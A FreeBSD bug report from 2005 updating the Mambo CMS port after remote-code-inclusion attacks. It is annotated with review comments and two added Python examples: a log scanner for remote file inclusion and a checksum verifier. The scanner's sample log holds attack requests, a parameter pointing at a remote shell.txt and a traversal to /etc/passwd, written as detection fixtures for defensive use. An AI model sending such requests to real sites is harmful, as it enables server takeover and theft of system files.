Bug 89665 - [Security Update]: www/mambo
Summary: [Security Update]: www/mambo
Status: Closed FIXED
Alias: None
Product: Ports & Packages
Classification: Unclassified
Component: Individual Port(s)
Version: Latest
Hardware: Any Any
Importance: Normal Affects Only Me
Assignee: Marcus Alves Grando
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2005-11-28 11:00 UTC by Francisco Alves Cabrita
Modified: 2005-11-29 19:51 UTC

See Also:


Description Francisco Alves Cabrita 2005-11-28 11:00:16 UTC
There has been a spate of attacks on Mambo sites in the last few days. These have been serious, in that they involved running arbitrary PHP code in the site attacked. This means that the security of information may have been compromised, and back door code may have been installed. Anyone who has been attacked should take great care to ensure that their site has been thoroughly restored to a safe condition. If advice is needed, please post in the Mambo forums.
http://www.mamboserver.com/index.php?option=com_content&task=view&id=172&Itemid=1

Fix: 

This patch blocks exploits that attempt to set a value
for the global used to indicate where code is to be loaded. By doing
this, the exploits allow arbitrary code to be loaded from a web site
under the hacker's control.

Makefile:
# Fragment as posted; the header lines (PORTNAME, PORTVERSION, CATEGORIES,
# MASTER_SITES, DISTFILES) precede it and are omitted here.
EXTRACT_DEPENDS=	unzip:${PORTSDIR}/archivers/unzip

NO_BUILD=	yes
USE_MYSQL=	yes
USE_PHP=	mysql session zlib gd pdf xml pcre
WANT_PHP_WEB=	yes
PKGMESSAGE=	${WRKDIR}/pkg-message
SUB_FILES=	pkg-message
SUB_LIST+=	MAMBO_DIR=${MAMBO_DIR}
PLIST_SUB+=	MAMBO_DIR=${MAMBO_DIR}

MAMBO_DIR?=	www/${PORTNAME}
DIST_SUBDIR=	${PORTNAME}

# Two distfiles: the upstream tarball and the vendor security-fix overlay.
MAMBO_SRC=	MamboV4.5.3-stable.tar.gz
MAMBO_PATCH1=	Mambo4523.security_fix.zip

# Unpack the tarball, then unzip the fix on top of it (-o overwrites the
# vulnerable originals in place). The zip is what makes this a patched
# install, so its distinfo checksum is what pins the fix that lands.
do-extract:
	@${MKDIR} ${WRKSRC}
	@${TAR} -zxf ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_SRC} -C ${WRKSRC}
	@${UNZIP_CMD} -qo ${DISTDIR}/${DIST_SUBDIR}/${MAMBO_PATCH1} -d ${WRKSRC}
	@${RM} -rf ${WRKSRC}/templates/rhuk_solarflare # remove empty directory

# Copy the tree under ${PREFIX}/${MAMBO_DIR}. INSTALL_DATA installs files
# read-only (mode 444); every file and directory is then chowned to the web
# server user so PHP can write into the tree. Note the trade-off: as owner,
# a compromised PHP process can chmod and rewrite the installed code.
do-install:
	@${MKDIR} ${PREFIX}/${MAMBO_DIR}
	@cd ${WRKSRC} && \
	  ${FIND} . -type d -exec ${MKDIR} ${PREFIX}/${MAMBO_DIR}/{} \; \
	    -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \;
	@cd ${WRKSRC} && \
	  ${FIND} . \! -type d -exec ${INSTALL_DATA} {} ${PREFIX}/${MAMBO_DIR}/{} \; \
	    -exec ${CHOWN} ${WWWOWN}:${WWWGRP} ${PREFIX}/${MAMBO_DIR}/{} \;

post-install:
	@${CAT} ${PKGMESSAGE}

.include <bsd.port.mk>


Thanks in advance
Francisco Alves Cabrita
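Added example, not part of the PR or of Mambo: the attack described above (a request setting the path global so that code is loaded from the attacker's web site) leaves a visible trace in the web server access log, namely a query parameter whose value is itself a URL. The script below scans Apache-style log lines for that signature and, optionally, for any request that names a watched parameter at all. The log lines are constructed for illustration, the IPs are documentation ranges, and `cfg_path` is a placeholder for the global the PR describes but does not name.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-style access log lines for illustration; not from any real server.
# "cfg_path" stands in for the path global the PR describes but does not name.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Nov/2005:10:01:02 +0000] "GET /index.php?option=com_content&task=view&id=172&Itemid=1 HTTP/1.1" 200 8120
203.0.113.9 - - [28/Nov/2005:10:02:15 +0000] "GET /index.php?cfg_path=http://198.51.100.7/shell.txt? HTTP/1.1" 200 512
203.0.113.9 - - [28/Nov/2005:10:02:16 +0000] "GET /index.php?cfg_path=HTTP%3A%2F%2F198.51.100.7%2Fshell.txt%3F HTTP/1.1" 200 512
203.0.113.11 - - [28/Nov/2005:10:05:40 +0000] "GET /administrator/index.php?cfg_path=../../../../etc/passwd%00 HTTP/1.1" 500 211
203.0.113.5 - - [28/Nov/2005:10:06:01 +0000] "POST /index.php HTTP/1.1" 200 4100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# A query value that is itself an absolute URL is the signature of the attack the PR describes:
# a register_globals-style override that makes the application include code from a remote host.
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def find_rfi_attempts(log_text, watched_params=frozenset()):
    """Return one record per suspicious (request, parameter) pair.

    Two rules:
      1. any parameter whose URL-decoded value starts with http://, https:// or ftp://;
      2. any parameter whose name is in watched_params, whatever its value, because a
         request should never be allowed to set an internal path global at all (this also
         catches the local-path / traversal variant of the same overwrite).
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl decodes %XX escapes, so an encoded "http%3A%2F%2F" is seen as "http://".
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value.strip()):
                reason = "remote URL in parameter"
            elif name in watched_params:
                reason = "request sets watched path global"
            else:
                continue
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "target": m.group("target"),
                "param": name,
                "value": value,
                "status": int(m.group("status")),
                "reason": reason,
            })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG, watched_params={"cfg_path"}):
        print("%(ip)s %(time)s %(reason)s: %(param)s=%(value)r (HTTP %(status)d)" % hit)
```

Two caveats when running this over a real log: the first rule will also flag legitimate parameters that carry URLs (return addresses, feed URLs), so review hits rather than block on them; and register_globals imports POST bodies and cookies as well as the query string, which the access log does not show, so a clean log does not prove a clean site.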
Comment 1 Edwin Groothuis freebsd_committer freebsd_triage 2005-11-28 11:03:11 UTC
Maintainer of www/mambo,

Please note that PR ports/89665 has just been submitted.

If it contains a patch for an upgrade, an enhancement or a bug fix
you agree on, reply to this email stating that you approve the patch
and a committer will take care of it.

The full text of the PR can be found at:
    http://www.freebsd.org/cgi/query-pr.cgi?pr=ports/89665

-- 
Edwin Groothuis
edwin@FreeBSD.org
Comment 2 Edwin Groothuis freebsd_committer freebsd_triage 2005-11-28 11:03:18 UTC
State Changed
From-To: open->feedback

Awaiting maintainers feedback
Comment 3 Francisco Cabrita <include> 2005-11-28 11:23:04 UTC
I think I have a problem with my copy-paste...

The last PR is wrong. This one is correct.

--- Makefile_old	Mon Nov 28 10:52:56 2005
+++ Makefile	Mon Nov 28 10:31:56 2005
@@ -6,9 +6,11 @@

  PORTNAME=	mambo
  PORTVERSION=	4.5.2.3
+PORTREVISION= 1
  CATEGORIES=	www
-MASTER_SITES=	http://mamboforge.net/frs/download.php/4004/:source1 \
-		http://mamboforge.net/frs/download.php/6159/:source2
+MASTER_SITES=	http://mamboforge.net/frs/download.php/6151/:source1 \
+	  http://mamboforge.net/frs/download.php/7636/:source2
+
  DISTFILES=	${MAMBO_SRC}:source1 \
  		${MAMBO_PATCH1}:source2

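Review bot: the lone `+` line after the second MASTER_SITES entry adds a stray blank line, and the continuation `+	  http://mamboforge.net/frs/download.php/7636/:source2` is indented with a tab plus spaces where the lines it replaces used two tabs; drop the blank line and keep tab alignment. Both download IDs change, not just one, so it is worth a sentence in the PR saying that the first site now serves a different tarball (the second hunk renames MAMBO_SRC) rather than leaving the committer to infer it from the distinfo.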
@@ -29,8 +31,8 @@
  MAMBO_DIR?=	www/${PORTNAME}
  DIST_SUBDIR=	${PORTNAME}

-MAMBO_SRC=	MamboV4.5.2-Stable.tar.gz
-MAMBO_PATCH1=	Patch_4.5.2_to_4.5.2.3.zip
+MAMBO_SRC=	MamboV4.5.3-stable.tar.gz
+MAMBO_PATCH1=	Mambo4523.security_fix.zip

  do-extract:
  		@${MKDIR} ${WRKSRC}
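Review bot: MAMBO_SRC becomes MamboV4.5.3-stable.tar.gz while PORTVERSION stays 4.5.2.3 (the first hunk only bumps PORTREVISION to 1). If the new tarball is a later upstream release, PORTVERSION should be bumped and PORTREVISION dropped; if it is the same 4.5.2.3 code under a renamed file, please say so in the PR so nobody has to guess. Either way, Mambo4523.security_fix.zip is unzipped with -o over the extracted tree, so the distinfo entry for that zip is the only thing pinning which fix actually lands.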


--- distinfo_old	Mon Nov 28 10:52:56 2005
+++ distinfo	Mon Nov 28 10:31:13 2005
@@ -1,4 +1,6 @@
-MD5 (mambo/MamboV4.5.2-Stable.tar.gz) = 6f4f934bc26ceed05137a23a1dcf8a54
-SIZE (mambo/MamboV4.5.2-Stable.tar.gz) = 1561319
-MD5 (mambo/Patch_4.5.2_to_4.5.2.3.zip) = 3202877a1f03b2ff723bf5a2c1f07869
-SIZE (mambo/Patch_4.5.2_to_4.5.2.3.zip) = 88505
+MD5 (mambo/MamboV4.5.3-stable.tar.gz) = 8b72f304d6347935ebad42e0daa37b1a
+SHA256 (mambo/MamboV4.5.3-stable.tar.gz) = 
ef3fe42f5e65f27bdeb3becb673964aa237896f03d0959c06863c4d80b565e93
+SIZE (mambo/MamboV4.5.3-stable.tar.gz) = 1523660
+MD5 (mambo/Mambo4523.security_fix.zip) = 488d72591808f2116f1422733ad8f514
+SHA256 (mambo/Mambo4523.security_fix.zip) = 
07bfe5d3f74e4645e99d4e97041f4fb93cfcc5f6160e0a0f46a2ea7f773ec7d6
+SIZE (mambo/Mambo4523.security_fix.zip) = 10415
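Review bot: both SHA256 lines are wrapped: `+SHA256 (mambo/MamboV4.5.3-stable.tar.gz) = ` ends one line and the digest sits alone on the next without a `+`, so the hunk as pasted has eight added lines where `@@ -1,4 +1,6 @@` promises six, and the resulting distinfo would not parse for `make checksum`. This looks like mail wrapping; attach distinfo as a file or resend the hunk unwrapped. Moving from MD5-only entries to MD5 plus SHA256 is the right direction, but the committer should regenerate the file with `make makesum` against freshly fetched distfiles rather than commit pasted hashes.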


--- pkg-plist_old	Mon Nov 28 10:52:56 2005
+++ pkg-plist	Mon Nov 28 10:45:50 2005
@@ -1,5 +1,5 @@
  @exec mkdir -p %D/%%MAMBO_DIR%%/cache/com_banners
-%%MAMBO_DIR%%/CHANGELOG
+%%MAMBO_DIR%%/read_me.txt
  %%MAMBO_DIR%%/INSTALL
  %%MAMBO_DIR%%/LICENSE
  %%MAMBO_DIR%%/administrator/backups/index.html
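Review bot: `+%%MAMBO_DIR%%/read_me.txt` is dropped into the slot CHANGELOG occupied, ahead of INSTALL and LICENSE; plist entries are kept sorted and a lowercase name sorts after the uppercase ones, so move it down. Also confirm that CHANGELOG is absent from the new tarball rather than renamed, otherwise an installed file will be missing from the plist.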
@@ -1247,7 +1247,6 @@
  @dirrm %%MAMBO_DIR%%/components/com_contact
  @dirrm %%MAMBO_DIR%%/components/com_banners
  @dirrm %%MAMBO_DIR%%/components
-@dirrm %%MAMBO_DIR%%/cache/com_banners
  @dirrm %%MAMBO_DIR%%/cache
  @dirrm %%MAMBO_DIR%%/administrator/templates/mambo_admin_blue/images
  @dirrm %%MAMBO_DIR%%/administrator/templates/mambo_admin_blue/css
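Review bot: removing `@dirrm %%MAMBO_DIR%%/cache/com_banners` while keeping `@exec mkdir -p %D/%%MAMBO_DIR%%/cache/com_banners` at the top of the plist leaves the directory that @exec creates behind on deinstall, and the following `@dirrm %%MAMBO_DIR%%/cache` then fails on a non-empty directory. Either keep the @dirrm (or pair the @exec with an @unexec rmdir), or drop the @exec as well if the new tarball ships that directory with files listed in the plist.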

Sorry, Monday morning problems :)

Francisco
--
Nucleo Portugues de FreeBSD - Core Member
http://npf.pt.freebsd.org
http://npf.pt.freebsd.org/~include/
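Added example, not part of the PR or of the ports framework: the distinfo in the patch above is what ties the install to exactly the tarball and security-fix zip the submitter tested, so a reviewer wants to see it parsed and checked rather than eyeballed. The script below parses distinfo lines of the form shown (MD5, SHA256, SIZE), rejects a wrapped line like the ones in the pasted hunk instead of guessing, and verifies a fetched file against an entry. The PR's own values are used as parse input with the wrapped lines rejoined; the file it hashes is a constructed six-byte stand-in (its digests are those of b"hello\n"), not a real Mambo distfile.

```python
import hashlib
import os
import re
import tempfile

# One distinfo line: "<ALGO> (<subdir>/<file>) = <value>"
DISTINFO_RE = re.compile(r"^(?P<algo>MD5|SHA256|SIZE) \((?P<name>[^)]+)\) = (?P<value>\S+)$")

# The distinfo from the PR with the mail-wrapped SHA256 lines rejoined (values as posted, not recomputed).
PR_DISTINFO = """\
MD5 (mambo/MamboV4.5.3-stable.tar.gz) = 8b72f304d6347935ebad42e0daa37b1a
SHA256 (mambo/MamboV4.5.3-stable.tar.gz) = ef3fe42f5e65f27bdeb3becb673964aa237896f03d0959c06863c4d80b565e93
SIZE (mambo/MamboV4.5.3-stable.tar.gz) = 1523660
MD5 (mambo/Mambo4523.security_fix.zip) = 488d72591808f2116f1422733ad8f514
SHA256 (mambo/Mambo4523.security_fix.zip) = 07bfe5d3f74e4645e99d4e97041f4fb93cfcc5f6160e0a0f46a2ea7f773ec7d6
SIZE (mambo/Mambo4523.security_fix.zip) = 10415
"""


def parse_distinfo(text):
    """Map each distfile name to its recorded {"MD5", "SHA256", "SIZE"} values."""
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = DISTINFO_RE.match(line)
        if not m:
            # A wrapped digest (as in the PR as pasted) lands here: refuse rather than guess.
            raise ValueError("malformed distinfo line: %r" % raw)
        entry = entries.setdefault(m.group("name"), {})
        algo, value = m.group("algo"), m.group("value")
        entry[algo] = int(value) if algo == "SIZE" else value.lower()
    return entries


def verify_distfile(path, expected):
    """Compare a fetched file with one distinfo entry; returns a list of problems (empty means it matches)."""
    problems = []
    if "SIZE" in expected and os.path.getsize(path) != expected["SIZE"]:
        problems.append("SIZE mismatch")
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            md5.update(chunk)
            sha256.update(chunk)
    if "SHA256" not in expected:
        # MD5-only pins (the old distinfo) are not collision resistant; insist on SHA256.
        problems.append("no SHA256 recorded")
    elif sha256.hexdigest() != expected["SHA256"]:
        problems.append("SHA256 mismatch")
    if "MD5" in expected and md5.hexdigest() != expected["MD5"]:
        problems.append("MD5 mismatch")
    return problems


def check_constructed_sample():
    """Run the checker on constructed files: a stand-in whose contents are b"hello\\n" and a tampered copy."""
    # Constructed entry: digests of the six bytes b"hello\n", not of any real Mambo distfile.
    sample = parse_distinfo(
        "MD5 (example/stand-in.tar.gz) = b1946ac92492d2347c6235b4d2611184\n"
        "SHA256 (example/stand-in.tar.gz) = 5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03\n"
        "SIZE (example/stand-in.tar.gz) = 6\n"
    )["example/stand-in.tar.gz"]
    results = {}
    with tempfile.TemporaryDirectory() as d:
        good, bad = os.path.join(d, "good.tar.gz"), os.path.join(d, "bad.tar.gz")
        with open(good, "wb") as f:
            f.write(b"hello\n")
        with open(bad, "wb") as f:
            f.write(b"hello!\n")  # one extra byte: size and both digests change
        results["good"] = verify_distfile(good, sample)
        results["tampered"] = verify_distfile(bad, sample)
    return results


if __name__ == "__main__":
    for name, entry in parse_distinfo(PR_DISTINFO).items():
        print(name, "size=%d" % entry["SIZE"], "sha256=%s..." % entry["SHA256"][:16])
    print(check_constructed_sample())
```

The point of the SIZE check before hashing is cheapness: a truncated or substituted download is caught without reading it. The "no SHA256 recorded" result is deliberate, since a distinfo that only carries MD5, as the old one did, pins the file against accidental corruption but not against a substituted archive.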
Comment 4 Francisco Cabrita <include> 2005-11-28 11:59:22 UTC
Yes

--
Nucleo Portugues de FreeBSD - Core Member
http://npf.pt.freebsd.org
http://npf.pt.freebsd.org/~include/

On Mon, 28 Nov 2005, Edwin Groothuis wrote:

> Synopsis: [Security Update]: www/mambo
>
> State-Changed-From-To: open->feedback
> State-Changed-By: edwin
> State-Changed-When: Mon Nov 28 11:03:18 GMT 2005
> State-Changed-Why:
> Awaiting maintainers feedback
>
> http://www.freebsd.org/cgi/query-pr.cgi?pr=89665
>
Comment 5 Marcus Alves Grando freebsd_committer freebsd_triage 2005-11-29 19:32:16 UTC
Responsible Changed
From-To: freebsd-ports-bugs->mnag

I'll take it.
Comment 6 Marcus Alves Grando freebsd_committer freebsd_triage 2005-11-29 19:51:00 UTC
State Changed
From-To: feedback->closed

Committed, with minor changes. Thanks!